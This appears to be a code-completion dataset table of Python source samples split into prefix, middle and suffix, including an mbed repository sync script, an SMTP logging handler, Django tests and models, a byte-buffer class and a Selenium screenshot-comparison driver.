repo_name (string, 5–100) | path (string, 4–231) | language (1 class) | license (15 classes) | size (int64, 6–947k) | score (float64, 0–0.34) | prefix (string, 0–8.16k) | middle (string, 3–512) | suffix (string, 0–8.17k)
|---|---|---|---|---|---|---|---|---|
bikeNomad/mbed | workspace_tools/synch.py | Python | apache-2.0 | 11,453 | 0.005413 |
"""
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
One repository to update them all
On mbed.org the mbed SDK is split across multiple repositories; this script
takes care of updating them all.
"""
import sys
from copy import copy
from os import walk, remove, makedirs
from os.path import join, abspath, dirname, relpath, exists, isfile
from shutil import copyfile
from optparse import OptionParser
import re
import string
ROOT = abspath(join(dirname(__file__), ".."))
sys.path.insert(0, ROOT)
from workspace_tools.settings import MBED_ORG_PATH, MBED_ORG_USER, BUILD_DIR
from workspace_tools.paths import *
from workspace_tools.utils import run_cmd
MBED_URL = "mbed.org"
MBED_USER = "mbed_official"
changed = []
push_remote = True
quiet = False
commit_msg = ''
# Code that has a mirror in the mbed SDK
# Tuple data: (repo_name, list_of_code_dirs, [team])
# team is optional - if not specified, the code is published under mbed_official
OFFICIAL_CODE = (
("mbed-dev" , MBED_BASE),
("mbed-rtos", RTOS),
("mbed-dsp" , DSP),
("mbed-rpc" , MBED_RPC),
("lwip" , LWIP_SOURCES+"/lwip"),
("lwip-sys", LWIP_SOURCES+"/lwip-sys"),
("Socket" , LWIP_SOURCES+"/Socket"),
("lwip-eth" , ETH_SOURCES+"/lwip-eth"),
("EthernetInterface", ETH_SOURCES+"/EthernetInterface"),
("USBDevice", USB),
("USBHost" , USB_HOST),
("CellularModem", CELLULAR_SOURCES),
("CellularUSBModem", CELLULAR_USB_SOURCES),
("UbloxUSBModem", UBLOX_SOURCES),
("UbloxModemHTTPClientTest", [TEST_DIR+"/net/cellular/http/common", TEST_DIR+"/net/cellular/http/ubloxusb"]),
("UbloxModemSMSTest", [TEST_DIR+"/net/cellular/sms/common", TEST_DIR+"/net/cellular/sms/ubloxusb"]),
("FATFileSystem", FAT_FS, "mbed-official"),
)
# Code that has dependencies on libraries should point to the latest
# revision; by default, they point to a specific revision.
CODE_WITH_DEPENDENCIES = (
# Libraries
"Ethernet
|
Interface",
# RTOS Examples
"rtos_basic",
"rtos_isr",
"rtos_mail",
"rtos_mutex",
"rtos_queue",
"rtos_semaphore",
"rtos_signals",
"rtos_timer",
# Net Examples
"TCPEchoClient",
"TCPEchoServer",
"TCPSocket_HelloWorld",
"UDPSocket_HelloWorld",
"UDPEchoClient",
"UDPEchoServer",
"BroadcastReceive",
"BroadcastSend",
# mbed sources
"mbed-src-program",
)
# A list of regular expressions that will be checked against each directory
# name and skipped if they match.
IGNORE_DIRS = (
)
IGNORE_FILES = (
'COPYING',
'\.md',
"\.lib",
"\.bld"
)
def ignore_path(name, reg_exps):
for r in reg_exps:
if re.search(r, name):
return True
return False
class MbedRepository:
@staticmethod
def run_and_print(command, cwd):
stdout, _, _ = run_cmd(command, wd=cwd, redirect=True)
print(stdout)
def __init__(self, name, team = None):
self.name = name
self.path = join(MBED_ORG_PATH, name)
if team is None:
self.url = "http://" + MBED_URL + "/users/" + MBED_USER + "/code/%s/"
else:
self.url = "http://" + MBED_URL + "/teams/" + team + "/code/%s/"
if not exists(self.path):
# Checkout code
if not exists(MBED_ORG_PATH):
makedirs(MBED_ORG_PATH)
self.run_and_print(['hg', 'clone', self.url % name], cwd=MBED_ORG_PATH)
else:
# Update
self.run_and_print(['hg', 'pull'], cwd=self.path)
self.run_and_print(['hg', 'update'], cwd=self.path)
def publish(self):
# The maintainer has to evaluate the changes first and explicitly accept them
self.run_and_print(['hg', 'addremove'], cwd=self.path)
stdout, _, _ = run_cmd(['hg', 'status'], wd=self.path)
if stdout == '':
print "No changes"
return False
print stdout
if quiet:
commit = 'Y'
else:
commit = raw_input(push_remote and "Do you want to commit and push? Y/N: " or "Do you want to commit? Y/N: ")
if commit == 'Y':
args = ['hg', 'commit', '-u', MBED_ORG_USER]
if commit_msg:
args = args + ['-m', commit_msg]
self.run_and_print(args, cwd=self.path)
if push_remote:
self.run_and_print(['hg', 'push'], cwd=self.path)
return True
# Check if a file is a text file or a binary file
# Taken from http://code.activestate.com/recipes/173220/
text_characters = "".join(map(chr, range(32, 127)) + list("\n\r\t\b"))
_null_trans = string.maketrans("", "")
def is_text_file(filename):
block_size = 1024
def istext(s):
if "\0" in s:
return 0
if not s: # Empty files are considered text
return 1
# Get the non-text characters (maps a character to itself then
# use the 'remove' option to get rid of the text characters.)
t = s.translate(_null_trans, text_characters)
# If more than 30% non-text characters, then
# this is considered a binary file
if float(len(t))/len(s) > 0.30:
return 0
return 1
with open(filename) as f:
res = istext(f.read(block_size))
return res
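# Editor's sketch (hypothetical files, not in the original script): the 30%
# heuristic above treats NUL bytes or mostly non-printable content as binary.
#
#   open('sample.txt', 'w').write('hello world\n')
#   open('sample.bin', 'wb').write('\x00' * 64)
#   is_text_file('sample.txt')   # -> 1 (text)
#   is_text_file('sample.bin')   # -> 0 (binary)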
# Return the line ending type for the given file ('cr' or 'crlf')
def get_line_endings(f):
examine_size = 1024
try:
tf = open(f, "rb")
lines, ncrlf = tf.readlines(examine_size), 0
tf.close()
for l in lines:
if l.endswith("\r\n"):
ncrlf = ncrlf + 1
return 'crlf' if ncrlf > len(lines) >> 1 else 'cr'
except:
return 'cr'
# Copy file to destination, but preserve destination line endings if possible
# This prevents very annoying issues with huge diffs that appear because of
# differences in line endings
def copy_with_line_endings(sdk_file, repo_file):
if not isfile(repo_file):
copyfile(sdk_file, repo_file)
return
is_text = is_text_file(repo_file)
if is_text:
sdk_le = get_line_endings(sdk_file)
repo_le = get_line_endings(repo_file)
if not is_text or sdk_le == repo_le:
copyfile(sdk_file, repo_file)
else:
print "Converting line endings in '%s' to '%s'" % (abspath(repo_file), repo_le)
f = open(sdk_file, "rb")
data = f.read()
f.close()
f = open(repo_file, "wb")
data = data.replace("\r\n", "\n") if repo_le == 'cr' else data.replace('\n','\r\n')
f.write(data)
f.close()
def visit_files(path, visit):
for root, dirs, files in walk(path):
# Ignore hidden directories
for d in copy(dirs):
full = join(root, d)
if d.startswith('.'):
dirs.remove(d)
if ignore_path(full, IGNORE_DIRS):
print "Skipping '%s'" % full
dirs.remove(d)
for file in files:
if ignore_path(file, IGNORE_FILES):
continue
visit(join(root, file))
def update_repo(repo_name, sdk_paths, team_name):
repo = MbedRepository(repo_name, team_name)
# copy files from mbed SDK to mbed_official repository
def visit_mbed_sdk(sdk_file):
repo_file = join(repo.path, relpath(sdk_file, sdk_path))
repo_dir = dirname(repo_file)
if not exists(repo_dir):
makedirs(repo_dir)
copy_with_line_endings(sdk_file, repo_file)
for sdk_path in sdk_paths:
visit_files(sdk_path, visit_mbed_sdk)
# remove repository files that do not exist in the mbed SDK
def visit_repo(repo_file):
for sdk_path in sdk_paths:
gary-dalton/Twenty47 | twenty47/logging.py | Python | mit | 3,990 | 0.003509 |
#!/usr/bin/env python
#
#
"""Test harness for the logging module. Tests BufferingSMTPHandler, an alternative implementation
of SMTPHandler.
Copyright (C) 2001-2002 Vinay Sajip. All Rights Reserved.
Modified to handle SMTP_SSL connections
"""
import string, logging, logging.handlers
from logging import Formatter
class BufferingSMTP_SSLHandler(logging.handlers.BufferingHandler):
'''
Modified to handle SMTP_SSL connections
'''
# Copyright 2001-2002 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# This file is part of the Python logging distribution. See
# http://www.red-dove.com/python_logging.html
def __init__(self, server, port, username, password, fromaddr, toaddrs, subject, capacity):
logging.handlers.BufferingHandler.__init__(self, capacity)
self.fromaddr = fromaddr
self.toaddrs = toaddrs
self.subject = subject
self.mailhost = server
self.mailport = port
self.username = username
self.password = password
self.setFormatter(logging.Formatter("%(asctime)s %(levelname)-5s %(message)s"))
def flush(self):
if len(self.buffer) > 0:
try:
import smtplib
smtp = smtplib.SMTP_SSL(self.mailhost, self.mailport)
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n" % (self.fromaddr, string.join(self.toaddrs, ","), self.subject)
for record in self.buffer:
s = self.format(record)
print s
msg = msg + s + "\r\n"
smtp.login(self.username, self.password)
smtp.sendmail(self.fromaddr, self.toaddrs, msg)
smtp.quit()
except:
self.handleError(None) # no particular record
self.buffer = []
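# Editor's note: logging.handlers.BufferingHandler.shouldFlush() triggers once
# len(self.buffer) >= capacity, so the capacity of 0 used in the setup below
# makes every logged record flush immediately -- one email per message.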
'''
Set up logging
'''
if app.config['LOG_TO_FILE']:
file_handler = logging.handlers.RotatingFileHandler(
app.config['LOG_FILENAME'],
maxBytes=100000,
backupCount=5)
file_handler.setLevel(app.config['LOG_FILE_LEVEL'])
file_handler.setFormatter(Formatter(
'%(asctime)s %(levelname)s: %(message)s '
'[in %(pathname)s:%(lineno)d]'
))
app.logger.addHandler(file_handler)
if app.config['LOG_TO_EMAIL']:
mail_handler = BufferingSMTP_SSLHandler(
app.config['MAIL_SERVER'],
app.config['MAIL_PORT'],
app.config['MAIL_USERNAME'],
app.config['MAIL_PASSWORD'],
app.config['DEFAULT_MAIL_SENDER'],
app.config['LOG_EMAIL_TO'],
app.config['LOG_EMAIL_SUBJECT'],
0,
)
mail_handler.setLevel(logging.WARNING)
mail_handler.setFormatter(Formatter('''
Message type: %(levelname)s
Location: %(pathname)s:%(lineno)d
Module: %(module)s
Function: %(funcName)s
Time: %(asctime)s
Message:
%(message)s
'''))
app.logger.addHandler(mail_handler)
cfpb/porchlight | porchlightapi/tests.py | Python | cc0-1.0 | 12,039 | 0.004902 |
# -*- coding: utf-8 -*-
from django.test import TestCase
import mock
import datetime
from dateutil import tz
## Repository Test
from porchlightapi.models import Repository
# Constant values used for testing
UNDEPLOYED_VALUE_TUPLE = ('c9d2d5b79edd7d4acaf7172a98203bf3aee2586a',
datetime.datetime(year=1972, month=3, day=17, hour=8, minute=23, tzinfo=tz.tzutc()),
5)
DEPLOYED_VALUE_TUPLE = ('ba60a64b151e402a9f08f95710ec09db4649eb2e',
datetime.datetime(year=1972, month=2, day=29, hour=10, minute=45, tzinfo=tz.tzutc()),
2)
class RepositoryTestCase(TestCase):
def setUp(self):
# Create a repository object for us to test
Repository.objects.create(
url='https://github.com/cfpb/porchlight',
name='Porchlight',
project='System Tools',
deployed_value_source='porchlightapi.sources.random_source',
undeployed_value_source='porchlightapi.sources.random_source',
value_calculator='porchlightapi.sources.difference_value_calculator')
@mock.patch("porchlightapi.sources.random_source")
def test_undeployed_value_source(self, random_source):
"""
Test that the model's undeployed_value() function correctly
uses the lookup function to get and run the mock data source
function.
"""
random_source.return_value = UNDEPLOYED_VALUE_TUPLE
test_repo = Repository.objects.get(url='https://github.com/cfpb/porchlight')
undeployed_value_tuple = test_repo.undeployed_value()
self.assertEqual(undeployed_value_tuple[0], UNDEPLOYED_VALUE_TUPLE[0])
self.assertEqual(undeployed_value_tuple[1], UNDEPLOYED_VALUE_TUPLE[1])
self.assertEqual(undeployed_value_tuple[2], UNDEPLOYED_VALUE_TUPLE[2])
@mock.patch("porchlightapi.sources.random_source")
def test_deployed_value_source(self, random_source):
"""
Test that the model's deployed_value() function correctly
uses the lookup function to get and run the mock data source
function.
"""
random_source.return_value = DEPLOYED_VALUE_TUPLE
test_repo = Repository.objects.get(url='https://github.com/cfpb/porchlight')
deployed_value_tuple = test_repo.deployed_value()
self.assertEqual(deployed_value_tuple[0], DEPLOYED_VALUE_TUPLE[0])
self.assertEqual(deployed_value_tuple[1], DEPLOYED_VALUE_TUPLE[1])
self.assertEqual(deployed_value_tuple[2], DEPLOYED_VALUE_TUPLE[2])
@mock.patch("porchlightapi.sources.difference_value_calculator")
def test_value(self, difference_value_calculator):
"""
Test that the model's value() function correctly uses the lookup function
to get and run the value calculator function.
"""
difference_value_calculator.return_value = 3
test_repo = Repository.objects.get(url='https://github.com/cfpb/porchlight')
self.assertEqual(test_repo.value(UNDEPLOYED_VALUE_TUPLE, DEPLOYED_VALUE_TUPLE),
5 - 2)
## Value Data Points
from porchlightapi.models import ValueDataPointManager
class ValueDataPointManagerTestCase(TestCase):
@mock.patch('porchlightapi.models.ValueDataPoint')
def test_create_datapoint(self, ValueDataPoint):
"""
Test the ValueDataPointManager's creation of ValueDataPoint
objects from Repository objects. The manager should populate
the ValueDataPoint using the Repository's value methods, which
call the appropriate callables.
"""
# Create a mock repository to pass to the ValueDataPointManager
# create_datapoint() method with the appropriate return values.
mock_repository = mock.create_autospec(Repository)
mock_repository.undeployed_value.return_value = UNDEPLOYED_VALUE_TUPLE
mock_repository.deployed_value.return_value = DEPLOYED_VALUE_TUPLE
mock_repository.value.return_value = 3
# We want to test that the create_datapoint method extracts the correct
# values from the repository and calls the default create() method with
# those values.
objects = ValueDataPointManager()
objects.create = mock.MagicMock()
datapoint = objects.create_datapoint(mock_repository)
objects.create.assert_called_with(
repository=mock_repository,
undeployed_identifier=UNDEPLOYED_VALUE_TUPLE[0],
undeployed_datetime=UNDEPLOYED_VALUE_TUPLE[1],
undeployed_value=UNDEPLOYED_VALUE_TUPLE[2],
deployed_identifier=DEPLOYED_VALUE_TUPLE[0],
deployed_datetime=DEPLOYED_VALUE_TUPLE[1],
deployed_value=DEPLOYED_VALUE_TUPLE[2],
value=3)
## Test Data Sources
import datetime
from porchlightapi.sources import github_commit_source
from porchlightapi.sources import github_tag_source
from porchlightapi.sources import json_file_source
class GithubDataSourceTestCase(TestCase):
def setUp(self):
"""
Set up the mock request responses for Github.
"""
# Call to /repos/porchlight is only interested in size
self.mock_repo_response = mock.MagicMock()
self.mock_repo_response.json.return_value = {u'size': 1619,}
# Call to /repos/porchlight/branches/master is used to
# get last commit SHA and URL
self.mock_branches_response = mock.MagicMock()
self.mock_branches_response.json.return_value = {u'commit':
{u'sha': u'130df1874519c11a79ac4a2e3e6671a165860441',
u'url': u'https://api.github.com/repos/cfpb/porchlight/commits/130df1874519c11a79ac4a2e3e6671a165860441'}
}
# Call to /repos/porchlight/tags is used to get latest commit SHA and
# tag name
self.mock_tags_response = mock.MagicMock()
self.mock_tags_response.json.return_value = [{
u'commit':{u'sha':u'130df1874519c11a79ac4a2e3e6671a165860441'},
u'name':u'v0.1.0'
},]
self.mock_no_tags_response = mock.MagicMock()
self.mock_no_tags_response.json.return_value = [{
u'commit':{u'sha':u'130df1874519c11a79ac4a2e3e6671a165860441'},
u'name':u'atag'
},]
# Call to the commit itself /repos/porchlight/commits/130df1874519c11a79ac4a2e3e6671a165860441
# is used to get the date and file data
self.mock_commit_response = mock.MagicMock()
self.mock_commit_response.json.return_value = {
u'commit': {u'committer': {u'date': u'2015-01-26 21:44:20Z',},},
u'files':[
{'additions': 1, 'deletions': 2, 'changes':3},
{'additions': 4, 'deletions': 5, 'changes':6},
{'additions': 7, 'deletions': 8, 'changes':9},
]
}
self.test_date = datetime.datetime(year=2015, month=01, day=26, hour=21,
minute=44, second=20, tzinfo=tz.tzutc())
# A mock repository with a URL
self.mock_repository = mock.create_autospec(Repository)
self.mock_repository.url = 'https://github.com/cfpb/porchlight'
@mock.patch("requests.get")
def test_github_commit_source(self, mock_request_get):
# Test that our Github source function correctly constructs URLs by
# mocking requests.get()
# There should be 3 calls to request.get(), one for the repository (to
# get size), one for branches, and one for commits.
# XXX: Because we're not using the repo size, it's been commented out to
# reduce API hits.
mock_request_get.side_effect = [
# self.mock_repo_response,
self.mock_branches_response,
self.mock_commit_response
]
source_tuple = github_commit_source(self.mock_repository)
self.assertEqual(source_tuple[0], '130df1874519c11a79ac4a2e3e6671a165860441')
self.assertEqual(source_tuple[1], self.test_date)
self.assertEqual(source_tuple[2], 15)
@mock.patch("requests.get")
def test_
AnythingTechPro/curionet | curionet/io.py | Python | apache-2.0 | 3,368 | 0.001485 |
"""
* Copyright (C) Caleb Marshall and others... - All Rights Reserved
* Written by Caleb Marshall <anythingtechpro@gmail.com>, May 27th, 2017
* Licensing information can be found in 'LICENSE', which is part of this source code package.
"""
import struct
class Endianness(object):
"""
An enum that stores network endianness formats
"""
NATIVE = '='
LITTLE_ENDIAN = '<'
BIG_ENDIAN = '>'
NETWORK = '!'
class DataBufferError(IOError):
"""
A data buffer specific io error
"""
class DataBufferIO(object):
"""
A class for manipulating (reading and/or writing) an array of bytes
"""
BYTE_ORDER = Endianness.NETWORK
def __init__(self, data=bytes(), offset=0):
self.data = data
self.offset = offset
@property
def byte_order(self):
return self.BYTE_ORDER
@property
def remaining(self):
return self.data[self.offset:]
def read(self, length):
data = self.remaining[:length]
self.offset += length
return data
def write(self, data):
if not data:
return
self.data += data
def clear(self):
self.data = bytes()
self.offset = 0
def read_from(self, fmt):
data = struct.unpack_from(self.byte_order + fmt, self.data, self.offset)
self.offset += struct.calcsize(fmt)
return data
def write_to(self, fmt, *args):
self.write(struct.pack(self.byte_order + fmt, *args))
def read_byte(self):
return self.read_from('b')[0]
def write_byte(self, value):
self.write_to('b', value)
def read_ubyte(self):
return self.read_from('B')[0]
def write_ubyte(self, value):
self.write_to('B', value)
def read_bool(self):
return self.read_from('?')[0]
def write_bool(self, value):
self.write_to('?', value)
def read_short(self):
return self.read_from('h')[0]
def write_short(self, value):
self.write_to('h', value)
def read_ushort(self):
return self.read_from('H')[0]
def write_ushort(self, value):
self.write_to('H', value)
def read_int(self):
return self.read_from('i')[0]
def write_int(self, value):
self.write_to('i', value)
def read_uint(self):
return self.read_from('I')[0]
def write_uint(self, value):
self.write_to('I', value)
def read_long(self):
return self.read_from('l')[0]
def write_long(self, value):
self.write_to('l', value)
def read_ulong(self):
return self.read_from('L')[0]
def write_ulong(self, value):
self.write_to('L', value)
def read_long_long(self):
return self.read_from('q')[0]
def write_long_long(self, value):
self.write_to('q', value)
def read_ulong_long(self):
return self.read_from('Q')[0]
def write_ulong_long(self, value):
self.write_to('Q', value)
def read_float(self):
return self.read_from('f')[0]
def write_float(self, value):
self.write_to('f', value)
def read_double(self):
return self.read_from('d')[0]
def write_double(self, value):
self.write_to('d', value)
def read_char(self):
return self.read_from('s')[0]
def write_char(self, value):
self.write_to('s', value)
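# Editor's sketch (not part of the original module): a round trip through the
# buffer in network byte order, using only the class defined above.
if __name__ == '__main__':
    buf = DataBufferIO()
    buf.write_ushort(512)               # packs '!H' -> b'\x02\x00'
    buf.write_double(3.14)              # packs '!d', 8 bytes
    reader = DataBufferIO(buf.data)
    assert reader.read_ushort() == 512
    assert reader.read_double() == 3.14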
GoogleCloudPlatform/datacatalog-connectors-bi | google-datacatalog-sisense-connector/tests/google/datacatalog_connectors/sisense/prepare/assembled_entry_factory_test.py | Python | apache-2.0 | 13,804 | 0 |
#!/usr/bin/python
#
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from unittest import mock
from typing import Any, Dict
from google.cloud import datacatalog
from google.datacatalog_connectors.commons import prepare as commons_prepare
from google.datacatalog_connectors.sisense import prepare
class AssembledEntryFactoryTest(unittest.TestCase):
__PREPARE_PACKAGE = 'google.datacatalog_connectors.sisense.prepare'
__FACTORY_MODULE = f'{__PREPARE_PACKAGE}.assembled_entry_factory'
__FACTORY_CLASS = f'{__FACTORY_MODULE}.AssembledEntryFactory'
__PRIVATE_METHOD_PREFIX = f'{__FACTORY_CLASS}._AssembledEntryFactory'
@mock.patch(f'{__PREPARE_PACKAGE}.datacatalog_tag_factory'
f'.DataCatalogTagFactory')
@mock.patch(f'{__FACTORY_MODULE}.datacatalog_entry_factory'
f'.DataCatalogEntryFactory')
def setUp(self, mock_entry_factory, mock_tag_factory):
self.__factory = prepare.AssembledEntryFactory(
project_id='test-project',
location_id='test-location',
entry_group_id='test-entry-group',
user_specified_system='test-system',
server_address='https://test.server.com')
self.__mock_entry_factory = mock_entry_factory.return_value
self.__mock_tag_factory = mock_tag_factory.return_value
def test_constructor_should_set_instance_attributes(self):
attrs = self.__factory.__dict__
self.assertEqual(
self.__mock_entry_factory,
attrs['_AssembledEntryFactory__datacatalog_entry_factory'])
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entries_for_folder')
def test_make_assembled_entries_list_should_process_folders(
self, mock_make_assembled_entries_for_folder):
folder = self.__make_fake_folder()
mock_make_assembled_entries_for_folder.return_value = \
[commons_prepare.AssembledEntryData('test-folder', {})]
assembled_entries = self.__factory.make_assembled_entries_list(
folder, {})
self.assertEqual(1, len(assembled_entries))
mock_make_assembled_entries_for_folder.assert_called_once()
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entries_for_dashboard')
def test_make_assembled_entries_list_should_process_dashboards(
self, mock_make_assembled_entries_for_dashboard):
dashboard = self.__make_fake_dashboard()
mock_make_assembled_entries_for_dashboard.return_value = \
[commons_prepare.AssembledEntryData('test-dashboard', {})]
assembled_entries = self.__factory.make_assembled_entries_list(
dashboard, {})
self.assertEqual(1, len(assembled_entries))
mock_make_assembled_entries_for_dashboard.assert_called_once()
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}__make_assembled_entry_for_folder')
def test_make_assembled_entries_for_folder_should_process_folder(
self, mock_make_assembled_entry_for_folder):
folder = self.__make_fake_folder()
tag_templates_dict = {}
assembled_entries = self.__factory\
._AssembledEntryFactory__make_assembled_entries_for_folder(
folder, tag_templates_dict)
self.assertEqual(1, len(assembled_entries))
mock_make_assembled_entry_for_folder.assert_called_once_with(
folder, tag_templates_dict)
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}__make_assembled_entry_for_folder')
def test_make_assembled_entries_for_folder_should_process_child_folders(
self, mock_make_assembled_entry_for_folder):
child_folder = self.__make_fake_folder()
parent_folder = self.__make_fake_folder()
parent_folder['folders'] = [child_folder]
tag_templates_dict = {}
assembled_entries = self.__factory\
._AssembledEntryFactory__make_assembled_entries_for_folder(
parent_folder, tag_templates_dict)
self.assertEqual(2, len(assembled_entries))
self.assertEqual(2, mock_make_assembled_entry_for_folder.call_count)
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entry_for_dashboard')
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}__make_assembled_entry_for_folder')
def test_make_assembled_entries_for_folder_should_process_nested_dashboards( # noqa: E501
self, mock_make_assembled_entry_for_folder,
mock_make_assembled_entry_for_dashboard):
dashboard = self.__make_fake_dashboard()
folder = self.__make_fake_folder()
folder['dashboards'] = [dashboard]
tag_templates_dict = {}
assembled_entries = self.__factory\
._AssembledEntryFactory__make_assembled_entries_for_folder(
folder, tag_templates_dict)
self.assertEqual(2, len(assembled_entries))
mock_make_assembled_entry_for_folder.assert_called_once_with(
folder, tag_templates_dict)
mock_make_assembled_entry_for_dashboard.assert_called_once_with(
dashboard, tag_templates_dict)
def test_make_assembled_entry_for_folder_should_make_entry_and_tags(self):
folder = self.__make_fake_folder()
tag_template = datacatalog.TagTemplate()
tag_template.name = 'tagTemplates/sisense_folder_metadata'
tag_templates_dict = {'sisense_folder_metadata': tag_template}
fake_entry = ('test-folder', {})
entry_factory = self.__mock_entry_factory
entry_factory.make_entry_for_folder.return_value = fake_entry
fake_tag = datacatalog.Tag()
fake_tag.template = 'tagTemplates/sisense_folder_metadata'
tag_factory = self.__mock_tag_factory
tag_factory.make_tag_for_folder.return_value = fake_tag
assembled_entry = self.__factory\
._AssembledEntryFactory__make_assembled_entry_for_folder(
folder, tag_templates_dict)
self.assertEqual('test-folder', assembled_entry.entry_id)
self.assertEqual({}, assembled_entry.entry)
entry_factory.make_entry_for_folder.assert_called_once_with(folder)
tags = assembled_entry.tags
self.assertEqual(1, len(tags))
self.assertEqual('tagTemplates/sisense_folder_metadata',
tags[0].template)
tag_factory.make_tag_for_folder.assert_called_once_with(
tag_template, folder)
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entry_for_dashboard')
def test_make_assembled_entries_for_dashboard_should_process_dashboard(
self, mock_make_assembled_entry_for_dashboard):
dashboard = self.__make_fake_dashboard()
tag_templates_dict = {}
assembled_entries = self.__factory\
._AssembledEntryFactory__make_assembled_entries_for_dashboard(
dashboard, tag_templates_dict)
self.assertEqual(1, len(assembled_entries))
mock_make_assembled_entry_for_dashboard.assert_called_once_with(
dashboard, tag_templates_dict)
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}__make_assembled_entry_for_widget')
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entry_for_dashboard')
def test_make_assembled_entries_for_dashboard_should_process_nested_widgets( # noqa: E501
self, mock_make_assembled_entry_for_dashboard,
mock_make_assembled_entry_for_widget):
widget = self.__make_fake_widget()
dashboard = self.__make_fake_dashboard()
dashboard['widgets'] = [widget]
Titulacion-Sistemas/PracticasDjango | usuarios_logueados/usuarios/models.py | Python | gpl-2.0 | 791 | 0.011378 |
from django import forms
from django.contrib.auth.models import User
from django.forms import ModelForm
from django.db import models
# Create your models here.
# EDITING THE USER MODEL
User.add_to_class('usuario_sico', models.CharField(max_length=10, null=False, blank=False))
User.add_to_class('contrasenia_sico', models.CharField(max_length=10, null=False, blank=False))
#User.add_to_class('amigos', models.ManyToManyField('self', symmetrical=True, blank=True))
# FORMS
class SignUpForm(ModelForm):
class Meta:
model = User
fields = ['username', 'password', 'email', 'first_name', 'last_name', 'usuario_sico', 'contrasenia_sico']
widgets = {
'password': forms.PasswordInput(),
'contrasenia_sico': forms.PasswordInput(),
}
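# Editor's sketch (assumed view code, not in the original): ModelForm.save()
# would store the raw password, so hash it with set_password() before saving.
#
#   form = SignUpForm(request.POST)
#   if form.is_valid():
#       user = form.save(commit=False)
#       user.set_password(form.cleaned_data['password'])
#       user.save()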
jlane9/pytest-needle | pytest_needle/driver.py | Python | mit | 13,087 | 0.00214 |
"""pytest_needle.driver
.. codeauthor:: John Lane <jlane@fanthreesixty.com>
"""
import base64
from errno import EEXIST
import math
import os
import re
import sys
import pytest
from needle.cases import import_from_string
from needle.engines.pil_engine import ImageDiff
from PIL import Image, ImageDraw, ImageColor
from selenium.webdriver.remote.webdriver import WebElement
from pytest_needle.exceptions import ImageMismatchException, MissingBaselineException, MissingEngineException
if sys.version_info >= (3, 0):
from io import BytesIO as IOClass
# Ignoring since basestring is not redefined if running on python3
basestring = str # pylint: disable=W0622,C0103
else:
try:
from cStringIO import StringIO as IOClass
except ImportError:
from StringIO import StringIO as IOClass
DEFAULT_BASELINE_DIR = os.path.realpath(os.path.join(os.getcwd(), 'screenshots', 'baseline'))
DEFAULT_OUTPUT_DIR = os.path.realpath(os.path.join(os.getcwd(), 'screenshots'))
DEFAULT_ENGINE = 'needle.engines.pil_engine.Engine'
DEFAULT_VIEWPORT_SIZE = '1024x768'
class NeedleDriver(object): # pylint: disable=R0205
"""NeedleDriver instance
"""
ENGINES = {
'pil': DEFAULT_ENGINE,
'imagemagick': 'needle.engines.imagemagick_engine.Engine',
'perceptualdiff': 'needle.engines.perceptualdiff_engine.Engine'
}
def __init__(self, driver, **kwargs):
self.options = kwargs
self.driver = driver
# Set viewport position, size
self.driver.set_window_position(0, 0)
self.set_viewport()
@staticmethod
def _create_dir(directory):
"""Recursively create a directory
.. note:: From needle
https://github.com/python-needle/needle/blob/master/needle/cases.py#L125
:param str directory: Directory path to create
:return:
"""
try:
os.makedirs(directory)
except OSError as err:
if err.errno == EEXIST and os.path.isdir(directory):
return
raise err
def _find_element(self, element_or_selector=None):
"""Returns an element
:param element_or_selector: WebElement or tuple containing selector ex. ('id', 'mainPage')
:return:
"""
if isinstance(element_or_selector, tuple): # pylint: disable=R1705
elements = self.driver.find_elements(*element_or_selector)
return elements[0] if elements else None
elif isinstance(element_or_selector, WebElement):
return element_or_selector
raise ValueError("element_or_selector must be a WebElement or tuple selector")
@staticmethod
def _get_element_dimensions(element):
"""Returns an element's position and size
:param WebElement element: Element to get dimensions for
:return:
"""
if isinstance(element, WebElement):
# Get dimensions of element
location = element.location
size = element.size
return {
'top': int(location['y']),
'left': int(location['x']),
'width': int(size['width']),
'height': int(size['height'])
}
raise ValueError("element must be a WebElement")
def _get_element_rect(self, element):
"""Returns the two points that define the rectangle
:param WebElement element: Element to get points for
:return:
"""
dimensions = self._get_element_dimensions(element)
if dimensions:
return (
dimensions['left'],
dimensions['top'],
